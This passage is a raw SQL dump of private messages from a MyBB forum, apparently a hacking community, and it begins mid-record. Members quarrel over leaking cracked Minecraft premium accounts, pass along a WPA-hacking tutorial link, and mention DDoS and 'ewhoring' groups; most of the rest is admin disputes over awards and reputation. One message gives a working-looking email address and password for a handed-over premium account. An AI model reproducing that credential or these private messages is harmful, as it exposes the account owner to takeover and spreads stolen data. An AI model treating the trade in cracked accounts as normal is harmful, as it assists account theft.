im not leaking.iv got a tonne from my freinds on skype. so before you get on your high heels calm down,pfft accusing me of leaking [/quote] O really? care to explain this? : [IMG]http://i.imgur.com/9PrGW.jpg[/IMG] Why would your friends give away accounts to you? that makes no sense at all unless you have thousands of friends and they all have thousands of accounts to give away [/quote] and i dont have thousands of freinds its called i\'v some freinds that give me heaps all the time. [/quote] And why do they give you heaps all the time? EXACTLY!!! your story is a lie [/quote] because they crack them for a living :O', '1350809876', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3597', '258', '257', '258', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"257\";}}', '2', 'Re: hello', '0', '[quote=\'xEP1C_SC0P3Sx\'] [quote=\'PiXEL^OG\'] [quote=\'xEP1C_SC0P3Sx\'] [quote=\'PiXEL^OG\'] [quote=\'xEP1C_SC0P3Sx\'] [quote=\'PiXEL^OG\'] [quote=\'xEP1C_SC0P3Sx\'] would you like a mc premium account regards me [/quote] Nitro_Hitman gave them to you on Ubers He gave me 150 MC premium accounts , if you don\'t stop leaking i will tell Nitro_hitman and get you banned from Ubers because your leaking so stop it [/quote] excuse me the one i was going to give to you wasnt from nitro hitman so im not leaking.iv got a tonne from my freinds on skype. so before you get on your high heels calm down,pfft accusing me of leaking [/quote] O really? care to explain this? : [IMG]http://i.imgur.com/9PrGW.jpg[/IMG] Why would your friends give away accounts to you? that makes no sense at all unless you have thousands of friends and they all have thousands of accounts to give away [/quote] and i dont have thousands of freinds its called i\'v some freinds that give me heaps all the time. [/quote] And why do they give you heaps all the time? EXACTLY!!! your story is a lie [/quote] because they crack them for a living :O [/quote] i can\'t bother with this BS , do whatever you want but remember Karma bro', '1350809955', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3599', '257', '258', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"258\";}}', '2', 'Re: hello', '0', '[quote=\'PiXEL^OG\'] [quote=\'xEP1C_SC0P3Sx\'] [quote=\'PiXEL^OG\'] [quote=\'xEP1C_SC0P3Sx\'] [quote=\'PiXEL^OG\'] [quote=\'xEP1C_SC0P3Sx\'] [quote=\'PiXEL^OG\'] [quote=\'xEP1C_SC0P3Sx\'] would you like a mc premium account regards me [/quote] Nitro_Hitman gave them to you on Ubers He gave me 150 MC premium accounts , if you don\'t stop leaking i will tell Nitro_hitman and get you banned from Ubers because your leaking so stop it [/quote] excuse me the one i was going to give to you wasnt from nitro hitman so im not leaking.iv got a tonne from my freinds on skype. so before you get on your high heels calm down,pfft accusing me of leaking [/quote] O really? care to explain this? : [IMG]http://i.imgur.com/9PrGW.jpg[/IMG] Why would your friends give away accounts to you? that makes no sense at all unless you have thousands of friends and they all have thousands of accounts to give away [/quote] and i dont have thousands of freinds its called i\'v some freinds that give me heaps all the time. [/quote] And why do they give you heaps all the time? EXACTLY!!! your story is a lie [/quote] because they crack them for a living :O [/quote] i can\'t bother with this BS , do whatever you want but remember Karma bro [/quote] I just dont like being accused of some thing thats not true thats all.', '1350810223', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3601', '53', '257', '53', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"257\";}}', '2', 'Re: hey', '0', '[quote=\'xEP1C_SC0P3Sx\'] hey whats up.if you look on the who\'s online list its me and you and heaps of guest, why can\'t they just sign up [/quote] Idk. They are to lazy to sign up :D', '1350814425', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3603', '53', '257', '53', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"257\";}}', '2', 'wpa hacking tut', '0', 'http://www.hackforums.net/showthread.php?tid=1701845&highlight=wpa http://www.hack*forums.net/showthread.php?tid=1701845&highlight=wpa if the first link doesnt work . use the secod link. you have to remove the \"*\".', '1350814655', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3605', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Dude...', '0', 'One o my main jobs is awards... I cannot even do that now... Can you out me back.', '1350829098', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3653', '257', '1', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'hello', '0', 'hey joker whats up, i just wanted to say, do you know our groups like unique,ddosing,gaming,act, do you believe we should get a award for what group your in for example if your in the unique group you should get a unique award. thanks', '1350862084', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3614', '3', '1', '3', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Plugin', '0', '[quote=\'t3h jok3r\'] [quote=\'??????????¢™\'] Yo wassup JOKE DOG, I was wondering how did you get the Username Changes plugin to work? [/quote] What error are you getting? [/quote] When I activate it it gives me a mybb sql error or something.', '1350847025', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3609', '3', '1', '3', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Plugin', '0', 'Yo wassup JOKE DOG, I was wondering how did you get the Username Changes plugin to work?', '1350842986', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3611', '228', '61', '228', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"61\";}}', '2', 'Group request', '0', 'What do you think about it? http://l33thacking.net/thread-1027.html ', '1350843910', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3617', '3', '1', '3', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Plugin', '0', '[quote=\'t3h jok3r\'] [quote=\'??????????¢™\'] [quote=\'t3h jok3r\'] [quote=\'??????????¢™\'] Yo wassup JOKE DOG, I was wondering how did you get the Username Changes plugin to work? [/quote] What error are you getting? [/quote] When I activate it it gives me a mybb sql error or something. [/quote] Copy and paste the error. [/quote] MyBB SQL Error MyBB has experienced an internal SQL error and cannot continue. SQL Error: 1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near \'TYPE=ENGINE\' at line 8 Query: CREATE TABLE mybb_username_history ( id int(5) NOT NULL auto_increment, uid int(6) NOT NULL, username varchar(120) NOT NULL, date bigint(30), PRIMARY KEY (id), INDEX (uid) ) TYPE=ENGINE; Please contact the MyBB Group for support. ', '1350847187', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3650', '62', '1', '62', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Logo', '0', '[quote=\'t3h jok3r\'] [quote=\'R?????zo?\'] [quote=\'t3h jok3r\'] [quote=\'R?????zo?\'] check ewhoring section, I can\'t seem to add images to the threads. [/quote] Did you read the forum rules? :?: [/quote] I did, so you can\'t have a thread design so it all looks better? [/quote] Opps, I forgot to add something. Anyway, I disabled img and video tags in that section so people don\'t post pornographic content. [/quote] okay you did good, going to bed now.', '1350861757', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3620', '3', '1', '3', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Plugin', '0', '[quote=\'t3h jok3r\'] [quote=\'??????????¢™\'] [quote=\'t3h jok3r\'] [quote=\'??????????¢™\'] [quote=\'t3h jok3r\'] [quote=\'??????????¢™\'] Yo wassup JOKE DOG, I was wondering how did you get the Username Changes plugin to work? [/quote] What error are you getting? [/quote] When I activate it it gives me a mybb sql error or something. [/quote] Copy and paste the error. [/quote] MyBB SQL Error MyBB has experienced an internal SQL error and cannot continue. SQL Error: 1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near \'TYPE=ENGINE\' at line 8 Query: CREATE TABLE mybb_username_history ( id int(5) NOT NULL auto_increment, uid int(6) NOT NULL, username varchar(120) NOT NULL, date bigint(30), PRIMARY KEY (id), INDEX (uid) ) TYPE=ENGINE; Please contact the MyBB Group for support. [/quote] Plugin is outdated. Won\'t work. [/quote] So which plugin are you using? Also can you get on skype', '1350847717', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3622', '257', '53', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"53\";}}', '2', 'Re: wpa hacking tut', '0', '[quote=\'sirchamp\'] http://www.hackforums.net/showthread.php?tid=1701845&highlight=wpa http://www.hack*forums.net/showthread.php?tid=1701845&highlight=wpa if the first link doesnt work . use the secod link. you have to remove the \"*\". [/quote] thanks man appreciated ;) the link worked :O', '1350848498', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3624', '257', '82', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'that premium account ', '0', 'Hey here is that premium account, enjoy username: eliotbehr@gmail.com password: pencil please do not do a giveaway with it thanks:)', '1350851647', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3627', '62', '1', '62', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Logo', '0', '[quote=\'t3h jok3r\'] Can you resize the logo icon and/or try another text font? [/quote] http://i.imgur.com/RSCis.png sorry I don\'t have the time atm to change the font.', '1350858249', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3647', '62', '1', '62', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Logo', '0', '[quote=\'t3h jok3r\'] [quote=\'R?????zo?\'] check ewhoring section, I can\'t seem to add images to the threads. [/quote] Did you read the forum rules? :?: [/quote] I did, so you can\'t have a thread design so it all looks better?', '1350861554', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3630', '62', '1', '62', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Logo', '0', '[quote=\'t3h jok3r\'] [quote=\'R?????zo?\'] [quote=\'t3h jok3r\'] Can you resize the logo icon and/or try another text font? [/quote] http://i.imgur.com/RSCis.png sorry I don\'t have the time atm to change the font. [/quote] No problem about the font, the icon is my major concern and thanks a bunch. [/quote] no problem and fix my awards :P', '1350859155', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3644', '62', '1', '62', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Logo', '0', 'check ewhoring section, I can\'t seem to add images to the threads.', '1350861112', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3633', '62', '1', '62', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Logo', '0', '[quote=\'t3h jok3r\'] [quote=\'R?????zo?\'] [quote=\'t3h jok3r\'] [quote=\'R?????zo?\'] [quote=\'t3h jok3r\'] Can you resize the logo icon and/or try another text font? [/quote] http://i.imgur.com/RSCis.png sorry I don\'t have the time atm to change the font. [/quote] No problem about the font, the icon is my major concern and thanks a bunch. [/quote] no problem and fix my awards :P [/quote] Sure, which ones would you like? [/quote] I don\'t know, I just saw you gave me the GFX one. That\'s the only one I was looking for, you can do whatever you want. Oh and btw I need the password to the new rooms, is it with you or shall I pm the other guy? can\'t type the name atm.', '1350859311', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3636', '62', '1', '62', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Logo', '0', 'Okay thanks, I\'m going to bed after I post few threads :)', '1350859616', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3672', '257', '1', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: hello', '0', '[quote=\'t3h jok3r\'] [quote=\'xEP1C_SC0P3Sx\'] [quote=\'t3h jok3r\'] [quote=\'xEP1C_SC0P3Sx\'] hey joker whats up, i just wanted to say, do you know our groups like unique,ddosing,gaming,act, do you believe we should get a award for what group your in for example if your in the unique group you should get a unique award. thanks [/quote] Sorry but they don\'t have special awards. [/quote] ok are we allowed to ask for awards because i think i deserve the gaming award :) [/quote] Not really but since it\'s the starting yes. [/quote Thanks joker appreciated :) ', '1350862927', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3675', '257', '1', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: hello', '0', '[quote=\'t3h jok3r\'] [quote=\'xEP1C_SC0P3Sx\'] [quote=\'t3h jok3r\'] [quote=\'xEP1C_SC0P3Sx\'] [quote=\'t3h jok3r\'] [quote=\'xEP1C_SC0P3Sx\'] hey joker whats up, i just wanted to say, do you know our groups like unique,ddosing,gaming,act, do you believe we should get a award for what group your in for example if your in the unique group you should get a unique award. thanks [/quote] Sorry but they don\'t have special awards. [/quote] ok are we allowed to ask for awards because i think i deserve the gaming award :) [/quote] Not really but since it\'s the starting yes. [/quote] Thanks joker appreciated :) [/quote] Oh hell no, I didn\'t do it for free. I want REP :evil: [/quote] ok joker i +reped ypu 3+ but does count for rep asking JW', '1350865285', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3677', '257', '228', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"228\";}}', '2', 'hello', '0', 'hey i +reped you because i have been deciding who is the nicest member here and its you ', '1350865816', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3679', '228', '257', '228', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"257\";}}', '2', 'Re: hello', '0', '[quote=\'xEP1C_SC0P3Sx\'] hey i +reped you because i have been deciding who is the nicest member here and its you [/quote] tnx bro', '1350866302', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3681', '257', '228', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"228\";}}', '2', 'Re: hello', '0', '[quote=\'VirtualLegend\'] [quote=\'xEP1C_SC0P3Sx\'] hey i +reped you because i have been deciding who is the nicest member here and its you [/quote] tnx bro [/quote] no worries bro enjoy your ten rep :O', '1350866703', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3683', '257', '205', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"205\";}}', '2', 'hey ', '0', 'hey im going to +rep you are you fine with that', '1350871754', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3685', '205', '257', '205', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"257\";}}', '2', 'Re: hey ', '0', '[quote=\'xEP1C_SC0P3Sx\'] hey im going to +rep you are you fine with that [/quote] Hey mate, That\'s fine, much appreciated :)', '1350872075', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3688', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: A', '0', '[quote=\'t3h jok3r\'] http://l33thacking.net/misc.php?action=help&hid=12 [/quote] Dude I am in charge of awards... Not NHK... Also did you put the ex-co founder in my usertitle? How the fuck can I be a ex-co founder. You either were or weren\'t there is not used to be.... Like wth', '1350874444', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3691', '257', '1', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: hello', '0', '[quote=\'t3h jok3r\'] [quote=\'xEP1C_SC0P3Sx\'] [quote=\'t3h jok3r\'] [quote=\'xEP1C_SC0P3Sx\'] [quote=\'t3h jok3r\'] [quote=\'xEP1C_SC0P3Sx\'] [quote=\'t3h jok3r\'] [quote=\'xEP1C_SC0P3Sx\'] hey joker whats up, i just wanted to say, do you know our groups like unique,ddosing,gaming,act, do you believe we should get a award for what group your in for example if your in the unique group you should get a unique award. thanks [/quote] Sorry but they don\'t have special awards. [/quote] ok are we allowed to ask for awards because i think i deserve the gaming award :) [/quote] Not really but since it\'s the starting yes. [/quote] Thanks joker appreciated :) [/quote] Oh hell no, I didn\'t do it for free. I want REP :evil: [/quote] ok joker i +reped ypu 3+ but does count for rep asking JW [/quote] Lol I was joking but thanks anyway :D [/quote] oh really well can i have some rep because i noticed almost everyone here has rep from you except me, and i am one of the most active :O', '1350874745', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3693', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: A', '0', '[quote=\'t3h jok3r\'] [quote=\'Apathy\'] [quote=\'t3h jok3r\'] http://l33thacking.net/misc.php?action=help&hid=12 [/quote] Dude I am in charge of awards... Not NHK... Also did you put the ex-co founder in my usertitle? How the fuck can I be a ex-co founder. You either were or weren\'t there is not used to be.... Like wth [/quote] You are NOT THE FUCKING ONE WHO IS IN-CHARGE OF AWARDS! You neither are promised to become an admin again and NXK is NOT a TEMPORARY ADMIN. Do you get that or not? [/quote] I see how it is. Also I am still a co founder there is no possible to unbecome one. I did not think this would happen but I guess you never truly know someone on the internet. And worse you cannot trust your best internet ones either.:\'(', '1350874779', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3696', '257', '1', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: hello', '0', '[quote=\'t3h jok3r\'] [quote=\'xEP1C_SC0P3Sx\'] [quote=\'t3h jok3r\'] [quote=\'xEP1C_SC0P3Sx\'] [quote=\'t3h jok3r\'] [quote=\'xEP1C_SC0P3Sx\'] [quote=\'t3h jok3r\'] [quote=\'xEP1C_SC0P3Sx\'] [quote=\'t3h jok3r\'] [quote=\'xEP1C_SC0P3Sx\'] hey joker whats up, i just wanted to say, do you know our groups like unique,ddosing,gaming,act, do you believe we should get a award for what group your in for example if your in the unique group you should get a unique award. thanks [/quote] Sorry but they don\'t have special awards. [/quote] ok are we allowed to ask for awards because i think i deserve the gaming award :) [/quote] Not really but since it\'s the starting yes. [/quote] Thanks joker appreciated :) [/quote] Oh hell no, I didn\'t do it for free. I want REP :evil: [/quote] ok joker i +reped ypu 3+ but does count for rep asking JW [/quote] Lol I was joking but thanks anyway :D [/quote] oh really well can i have some rep because i noticed almost everyone here has rep from you except me, and i am one of the most active :O [/quote] Shoot, Didn\'t notice. [/quote] thanks very much. i am not going to ask again thanks admin :O', '1350874899', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3700', '61', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Hey man', '0', 'For the awards, How would I go about giving them. Not that i\'m going to give them all out, But Id like to know since in the help DOCX it says i\'m incharge of that. But In admin CP I have no privlidges ', '1350875101', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3704', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: A', '0', '[quote=\'t3h jok3r\'] [quote=\'Apathy\'] [quote=\'t3h jok3r\'] [quote=\'Apathy\'] [quote=\'t3h jok3r\'] http://l33thacking.net/misc.php?action=help&hid=12 [/quote] Dude I am in charge of awards... Not NHK... Also did you put the ex-co founder in my usertitle? How the fuck can I be a ex-co founder. You either were or weren\'t there is not used to be.... Like wth [/quote] You are NOT THE FUCKING ONE WHO IS IN-CHARGE OF AWARDS! You neither are promised to become an admin again and NXK is NOT a TEMPORARY ADMIN. Do you get that or not? [/quote] I see how it is. Also I am still a co founder there is no possible to unbecome one. I did not think this would happen but I guess you never truly know someone on the internet. And worse you cannot trust your best internet ones either.:\'( [/quote] Speaking of friendship and trust. I kept on requesting you to advertise LH on HF, did you? No. I told you to be active on LH, did you? No. Why did you make a public post saying NXK is a temp admin? Why don\'t you come online when you can go on HF? Fine you are not posting on HF but you can still come online on LH. I sent you PMs to discuss things to do help improve LH, you either say IDK, reply when I have already taken a decision or you never get a chance to see it then you jump down my throat. I still kept you admin, I was told by others to make you a normal member but still I kept you staff because I was once your friend but seems like you didn\'t consider me one. I even added you an admin once I removed you because I trusted you. [/quote] If I advertise LH I will get banned... I would do not want to get banned that is hardly fair. The last few weeks I have been very active and I post at least 2+ posts a day. You actually have not sent me pms to discuss anything. I never jumped down your throat I just asked you about it big difference.I am no longer your friend? No I did not consider you a friend I CONSIDERED YOU A BEST FRIEND. I never did anything to betray your trust when you added me back? ', '1350875350', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3773', '61', '7', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"7\";}}', '2', 'Re: Question', '0', '[quote=\'Romdu62\'] Why was lh does yesterday [/quote] Cloud fare was down.', '1351049005', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3708', '61', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Hey man', '0', 'Thank you good sir!', '1350875509', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3776', '62', '1', '62', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Leech report', '0', '[quote=\'t3h jok3r\'] Some guy who is now banned on LH has leeched some of our sites content. I reported some and got them removed by you are the original poster and you are also a member on the site it was leaked on, so file a report and get the content removed. Links to the leeched content http://www.leakforums.org/showthread.php?tid=30583 http://www.leakforums.org/showthread.php?tid=28802 [/quote] he even used my images, did you ban him?', '1351069387', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3715', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: A', '0', '[quote=\'t3h jok3r\'] [quote=\'Apathy\'] [quote=\'t3h jok3r\'] [quote=\'Apathy\'] [quote=\'t3h jok3r\'] [quote=\'Apathy\'] [quote=\'t3h jok3r\'] http://l33thacking.net/misc.php?action=help&hid=12 [/quote] Dude I am in charge of awards... Not NHK... Also did you put the ex-co founder in my usertitle? How the fuck can I be a ex-co founder. You either were or weren\'t there is not used to be.... Like wth [/quote] You are NOT THE FUCKING ONE WHO IS IN-CHARGE OF AWARDS! You neither are promised to become an admin again and NXK 